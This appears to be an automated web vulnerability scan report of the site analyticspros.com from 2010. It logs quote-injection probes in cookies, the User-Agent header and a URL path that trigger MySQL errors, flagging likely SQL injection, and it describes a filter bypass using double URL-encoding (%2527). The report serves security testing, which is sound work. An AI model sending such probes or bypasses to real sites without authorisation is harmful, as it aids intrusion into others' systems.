GET /blog/55-googleanalytics/77-refresh-rate-content-metric.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:01:58 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:01:59 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:01:59 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27914
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... <h2>Finding the proverbial Needle in the Haystack</h2> ...[SNIP]...
Request 2
GET /blog/55-googleanalytics/77-refresh-rate-content-metric.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:02:00 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:54:39 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:54:40 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1'; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:59:06 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1''; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:59:07 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the fpssCookie cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true%2527; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:52:43 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true%2527%2527; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:52:44 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:52:48 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:52:48 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/86-google-analytics-intelligence.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:09:51 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/86-google-analytics-intelligence.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527%2527;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:09:53 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:09:56 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:09:56 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21634
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the 1ee73a388da0bb7ec3d7afe3beccac53 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:59:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:59:18 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:59:20 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:59:20 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23610
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics'/91-google-analytics-cookies-and-domains.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:14:16 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics''/91-google-analytics-cookies-and-domains.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:14:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:14:19 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:14:20 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 51606
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)' Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:12:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'' Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:12:26 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:12:26 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:12:26 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 51710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
